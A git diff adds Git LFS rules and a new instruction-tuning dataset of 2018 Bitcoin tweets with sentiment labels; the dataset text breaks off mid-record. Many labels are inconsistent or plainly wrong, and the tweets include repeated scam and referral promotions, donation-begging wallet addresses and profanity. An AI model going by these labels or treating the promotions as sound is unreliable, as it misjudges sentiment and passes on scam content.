diff --git a/.gitattributes b/.gitattributes
index c7d9f3332a950355d5a77d85000f05e6f45435ea..ef34f8f9890be7b9bab243364f1db770a694c334 100644
--- a/.gitattributes
+++ b/.gitattributes
@@ -32,3 +32,5 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
 *.zip filter=lfs diff=lfs merge=lfs -text
 *.zst filter=lfs diff=lfs merge=lfs -text
 *tfevents* filter=lfs diff=lfs merge=lfs -text
+alpaca_data_cleaned_archive_origin.json filter=lfs diff=lfs merge=lfs -text
+cti-ATT-CK-v13.1/enterprise-attack/enterprise-attack.json filter=lfs diff=lfs merge=lfs -text
diff --git a/alpaca-bitcoin-sentiment-dataset.json b/alpaca-bitcoin-sentiment-dataset.json
new file mode 100644
index 0000000000000000000000000000000000000000..27bbbc65c369ab8a466e5f53916a427644e573d2
--- /dev/null
+++ b/alpaca-bitcoin-sentiment-dataset.json
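Review bot: The new `alpaca-bitcoin-sentiment-dataset.json` added in this same commit is matched by neither LFS rule added here, so it lands in the regular object store as a single very long line while the two named files are routed to LFS. If the intent is to keep dataset JSON out of regular git history, either add that file name alongside the other two or use a broader pattern such as `*.json filter=lfs diff=lfs merge=lfs -text`, accepting that the latter also captures small config JSON. `alpaca_data_cleaned_archive_origin.json` does not appear in the part of the diff visible here; if it was committed before this rule existed, the attribute alone does not convert the existing blob into an LFS pointer, so it is worth confirming the file is actually stored in LFS after this commit.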
@@ -0,0 +1 @@ +[{"instruction": "Detect the sentiment of the tweet.", "input": "@p0nd3ea Bitcoin wasn't built to live on exchanges.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@historyinflicks Buddy if I had whatever series of 19th diseases Bannon clearly has I'd want to be a bitcoin too.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@eatBCH @Bitcoin @signalapp @myWickr @Samsung @tipprbot patience is truly a virtue", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aantonop Even if Bitcoin crash tomorrow morning, the technology it\u2019s still revolutionary. A way of simplifying it. #Ihavetobepartofthis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I am experimenting whether I can live only with bit coins donated. Please cooperate.\n\n3NKbfJuuMKzNMYMcLqCf5w8TgeGvue7A5 ##bitcoin #Donation", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Cryptosaur @TradeSatoshi yeah my bitcoin deposit not showing up... 
lets just hope it eventually does", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 1 year: +792.65%, (+$7709.41) [Currently $8682.015] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Embrace the FUD.\n\nThat means more cheap coins for me and less dumb people in Bitcoin.\n\nI'm playing the long game.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 01:41:52 2018 (0:11)\nUSD : 8712.93\nWght: 0.44\nBlk#: 514742\nSize: 124.4 KB\nTXs: 208\nPool: 68 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#YABTCL - #Bitcoin #Lottery\nDraw #701 - Winning Numbers: 03-10-16-18-46-62", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000451731d60b7b0bc228f26b7b946cf3c610d52839d4e61a mined at height 514741.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000045b039632035f328a6dbbc05b69dbf562e103fb46bdf60 mined at height 514742.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Arab88612723 @marcdemesel BitcoinPlus is the real 2nd bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I am playing bitcoin trade, a loss of $ 300,000.\nMy life is over. 
#bitcoin #givemebitcoin #help\n\n\u3010BTC\u3011\n1PcXbdVubUPmy1xToYyjvho8rS #pleasert", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoShillNye HEY FUCK YOU, TRX IS NEXT BITCOIN BITCH.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NickSzabo4 Monopoly: Bitcoin Edition would be the least fun board game ever \ud83d\ude02", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Anybody that knows how to use bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoCobain I want to be a big man can u plzzz give me free bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "How do you lead a horse to water? With lots of carrots. #Proverb #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u201cSBI Bits has invested in more blockchain companies than Google.\u201d-Jerry Chan\n\n#bitcoincash #bitcoin #satoshivision conference", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@GetCoinJar @boostjuiceoz Watermelon, pineapple and strawberries. 
Sometimes sweet then sour which is how Bitcoin markets are.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NickSzabo4 I understood Bitcoin consensus from soccer matches without referees yet we played with well set rules", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@FaaipMusic I put 15k in bitcoin last month!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SSFCFOTY13 Yesterday I saw a guy with a license plate frame that said \"Bitcoin\" and his plate number was BTC.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TechnicalCrypto Pretty sure we could have tested bitcoin over the last 10 or so years", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DrawnActor @nvidia They told me to invest in bitcoin Kappa", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TalkingHat @stefapie all your Bitcoin are belong to us amirite guys", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "2) whispered.\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@kyletorpey In terms of casual use, dollars are known as bucks- pounds, quid etc. so calling Bitcoin Cash, bcash, isn\u2019t a problem either", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 01:49:23 2018 (7:31)\nUSD : 8694.09\nWght: 0.43\nBlk#: 514743\nSize: 341.1 KB\nTXs: 868\nPool: 69 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "My Momma Called Me Asking For 2 Thousand Dollars Off Bitcoin \ud83d\ude02\ud83d\ude02", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8719.42 / 7077.117\u20ac\n1 bitcoin-cash = $1016.99 / 825.439\u20ac\n1 ethereum = $540.051 / 438.332\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Education can train, but cannot create intelligence. #EdwardMcChesneySait #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000002fa5cee2ae556e0353f8090fa0d234a25d94c2bfb3e832 mined at height 514743.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#MAPS has 1 new tx\n(\ud83d\udcc8 input: 0.00115192 BTC / 10.03 USD)\nFinal balance: 0.00115192 BTC / 10.03 USD\n#donation #bitcoin #cryptopaymon \ud83e\udd16\ud83d\uddff\ud83d\udc4d", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AriseUniverse They probably use #BitCoin too", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Don't kid yourself. 
The rich will always control to some degree because they have the buying power...", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Thomas1774Paine Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Crypto shopping \ud83d\uded2\ud83d\udecd #crypto #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@caperthebard @stefapie You can buy ebaum's world merch with bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Billyisgreat123 LOL, obviously your clueless, bitcoin is good, just not as good as it once was", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Crypto #retweet bot. Follow for everything crypto. What to get your content #retweeted follow and DM I want retweet. #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "imagine calling yourself the dude nextdoor screaming about Bitcoin on my timeline yikes", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NickSzabo4 Every node, not just Trusted 3rd party nodes like some blockchains. Bitcoin is KING! 
not just a pretender to the thrown.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@kyletorpey I would go with dev, bcash is based on bitcoin code base for a reason", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lopp @psycho_sage @naval Would this child understand Bitcoin as trustworthy and use it as peer to peer cash?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Blued0g420 @MisterFarbridge yeah for sure, many things are over priced in this space. #Bitcoin is not one of them however \ud83d\ude0e", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Thanks to my persistence, hard work and constant observation of the markets I could create this FX Robot. #Close #CFD #Bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@QTRResearch What\u2019s bitcoin doing though", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Auggie velarde - bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is still early in the network effects game", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Patatobear I got a bitcoin for yu in tarkov ovo", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 0 satoshi per byte. \nBTC : $8694 / \u20ac7054 / \u00a36161 @ Block 514743. \nMarket Cap: 147.33B USD. #Bitcoin #\u30d3\u30c3\u30c8\u30b3\u30a4\u30f3", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8681.47 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 1 year: +796%, (+$7741.95) [Currently $8714.555] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@tferriss You mean bitcoin, right? 
C\u2019mon this is a joke.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Related Instagram tags for #cryptocurrency: #bitcoin #blockchain #crypto #ethereum #btc #litecoin #coinbase #trading #forex #ico #bitcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Market Cap: $335,683,404,227.00\nBitcoin Dominance: 43.99 %\n24H Volume: $14,688,906,280.00\n$BTC #pampit #bogdanoff", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30499.00000000 | BITCOIN(BLCHAIN) R$28780.52 | LITECOIN(MCDTBC) R$577.10000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8704.67", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I respect shitcoin's right to exist.\n\nBecause all y'all ain't nothing more than Bitcoin testnets.\n\nWe will jack all your innovations.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@crypToBanger Bitcoin 2013/2014?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Anyone else ever get that tingly feeling that we're part of something world-changing? #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bad news: Bitcoin on the decline.\nCurrent Rate: 8680.62 USD = 1 BTC", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,721.02, market cap of $147,683,819,562 (44.04%), and 24 hr vol. 
of $5,484,840,000 (37.48%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mar 22, 2018 06:00PM #Bitcoin Price:\nUSD 8752.51 | EUR 7067.80 | JPY 936418.95", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Two Hour Lull Update: CryptoCompare Bitcoin price: $8664.23 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Average Bitcoin market price is: USD 8,675.33, EUR 7,046.78", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8721.02\nEthereum:$540.487\nBitcoin Cash:$1017.03\nLitecoin:$163.289\nRipple:$0.657819\nIOTA:$1.33", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current BTC Dominance: 44.01% #Bitcoin #Altcoin #Cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin - BTC\nPrice: $8,721.02\nChange in 1h: -0.14%\nMarket cap: $147,683,819,562.00\nRanking: 1\n#Bitcoin #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8721.02 / 7078.415\u20ac\n1 bitcoin-cash = $1017.03 / 825.472\u20ac\n1 ethereum = $540.092 / 438.365\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8721.02 / 7078.415\u20ac\n1 bitcoin-cash = $1017.03 / 825.472\u20ac\n1 ethereum = $540.092 / 438.365\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 #BTC (#Bitcoin) quotes:\n$8650.00/$8652.82 #Bitstamp\n$8620.00/$8632.10 #Kraken\n\u21e2$-32.82/$-17.90\n$8598.93/$8685.36 #Coinbase\n\u21e2$-53.89/$35.36", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Install CryptoTab and mine Bitcoin! httpGet more than 1 BTC per month! Develop the network and get your rewardss://getcryptotab.com/422427", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003374 (-0.00000011) #BTC / 0.292824 (-0.00112) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002297 (-0.00000011) #BTC / 0.199412 (-0.00104) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0474768 (-0.00029230) #BTC / 412.08 (-2.72100) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004829 (+0.00000056) #BTC / 0.419721 (+0.00527) #USD. Market rank is 114. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00079116 (-0.00000373) #BTC / 6.86695 (-0.03540) #USD. 
Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8689.58 | -0.0032%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8650.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 02:00:20 2018 (10:57)\nUSD : 8651.21\nWght: 0.43\nBlk#: 514744\nSize: 491.3 KB\nTXs: 1165\nPool: 60 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Curious about where $BTC stands? Bitcoin is $8650.00 Enjoy your day. \u2195\ufe0f", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8650.00 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1,255 increase in MPI over sale of Bitcoin!!!!!!! (from this month over last month) Go! Go! Go!!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 0000000000000000000ddc396a7ed473727624a4e72287b0d9b45c8c6a1022c5 mined at height 514744.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8650.00 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8650.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@OTC_Bitcoin Will we see a 6k or lower bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8650.00 #BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@freebitco hello i want to win bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8650.00 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": ".Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@eskintan Thanks for supporting my art and #bitcoin brother!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Broke: Trying to identify and support young promising shitcoins.\n\nWoke: Trying to identify and support young promising Bitcoin talent.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zerosum0x0 @sundhaug92 \"I hacked Bitcoin using this weird trick!\"", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Enough people agreed that something with no intrinsic value is a tradeable commodity, so now we have President Bitcoin. 
Is that it?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Really need my crypto to blow up so I can buy a bitcoin gat", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8650.00.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TronNews_ Do you think trx will ever get rid off Bitcoin and become more steady?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Bitcoin Core is a cult trapped in a world of platonic forms.\" - @DanielKrawisz @Satoshis_Vision Conference", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@GlennDuggan Exactly, I also only pay with bitcoin to avoid a paper trail.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DepressionEcon And after bitcoin is done pumping. It\u2019ll be our time lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin daily looks like a retest of 8k is extremely likely $BTC $CRYPTO", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is my hedge. With the DJIA down 700+, if the global economy craps the bed in the next 10 years, Bitcoin will Rule...\n#Bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hey... here's some TA or whatever... 
#bitcoin is going to go sideways for FUCKING EVER!!!!!!", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I have 1,000 dollars in bitcoin and not afraid to use it", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8721.02 Down -$0.55 -0.01% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I want to learn!!! About Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8691.95 / 7054.821\u20ac\n1 bitcoin-cash = $1014.12 / 823.11\u20ac\n1 ethereum = $537.774 / 436.484\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.716,300\n1 Hour: -0.15 % | 24 Hours: -3.22 % | 7 Days: 5.95 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I used #bitcoin to buy headphones yesterday and they're gonna be here on Monday...\nWhat a time to be alive.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Blockchain is the tech. #Bitcoin is merely the first mainstream manifestation of its potential. 
#freecoins", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "HOY 22/3/18 euro Bs 284.672,70 c.c.t(tranf) Bs 259.622,64\nD.l.r bitcoin Bs258.889,58 today Bs 231.334,02", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Drive Genuine Cryptocurrency bitcoin traffic for ICO for $5: Welcome to the best bitcoin website traffic Want to Get\u2026", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin will be succesful long term if we worship a decentralized system, not a centralized leader.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Kevin_Pham how much did you invest to mine Bitcoin, Kevin ?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNN sooo what you're saying is only buy #bitcoin that is #madeintheusa", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 02:13:32 2018 (13:12)\nUSD : 8623.96\nWght: 0.43\nBlk#: 514745\nSize: 550.9 KB\nTXs: 1442\nPool: 34 (0.0 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9693.62 --- Includes Sum of Forks, Core $8624.00 (88.97%) + Cash $1010.13 (10.42%) + Gold $59.49 (0.61%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "please give me\n32yyeXCAqrxbKMvSDP9ymib64wJfB8GUbe\n\n#Ripple\n#Bitcoin\n#help", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000009fb95b43a4042b322c5468c7763368920718708ff65a0 mined at height 514745.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8666.39.\nThe current price of BCash is $1007.41, or 0.116903 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Bitcoin Core don't support creativity of people they don't know\" - @DanielKrawisz at @Satoshis_Vision #satoshisvision #BitcoinCash #bch", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token #ROX #Robotinaico", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$1.010,820\n1 Hour: -0.06 % | 24 Hours: -3.66 % | 7 Days: 8.95 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Kevin_Pham Trumps retarded policies and actions are about to make bitcoin way more valuable...probably sooner than later.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@pwthornton Bitcoin fans: Fuck the FDIC and big government regulations!\nAlso Bitcoin fans: What the fuck just happened to my money?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@twobitidiot Same. 
Gold is seen as a global currency and bitcoin is the new age version of it.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ValoremF a great bonus to pursue. #AdVelorem #Bitcoin #Valorem #Ico", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@pipis @makmummasjid Me ; \nPINTEREST RENEGADE, BRANDING INTERN, BITCOIN CZAR. IGNORING YOUR PASSION IS LIKE DYING A SLOW DEATH.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8648.6 / 7019.636\u20ac\n1 bitcoin-cash = $1012.28 / 821.617\u20ac\n1 ethereum = $534.693 / 433.983\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@tanjrinidad bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge Bitcoin #BCH Leaders \ud83c\udf0e\u270c\ud83c\udffb", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nlckstephens is bitcoin a woke ally", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "somebody teach me how to use bitcoin so I can get some actual coinT", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@illusionfoxe in fact by mining a bitcoin you actually end up spending a bunch of money. and/or burning your house down. 
